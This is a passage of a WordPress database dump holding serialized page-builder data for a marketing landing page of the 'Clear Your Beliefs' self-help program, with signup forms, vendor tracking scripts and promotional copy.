tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1271:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and\nNegative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1431:"<div id="divStroke" class="letter" style="padding-top: 0px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2820:"<div id="divStroke" class="letter">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:574:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines" />\n<center><i>© Copyright 2014 by Lion Goodman</i></center>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1398, 1839, '_wp_attached_file', '2014/11/cyb-3rd-head.jpg'),
(1399, 1839, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1024;s:6:"height";i:344;s:4:"file";s:24:"2014/11/cyb-3rd-head.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"cyb-3rd-head-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"cyb-3rd-head-300x100.jpg";s:5:"width";i:300;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:24:"cyb-3rd-head-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:24:"cyb-3rd-head-400x344.jpg";s:5:"width";i:400;s:6:"height";i:344;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:24:"cyb-3rd-head-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:24:"cyb-3rd-head-672x344.jpg";s:5:"width";i:672;s:6:"height";i:344;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1400, 1839, '_edit_lock', '1416534242:2'),
(1401, 1840, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1229:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u><br>and Negative Beliefs</strong></big> <big><strong><br>- Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1402, 1841, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1223:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -23px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear 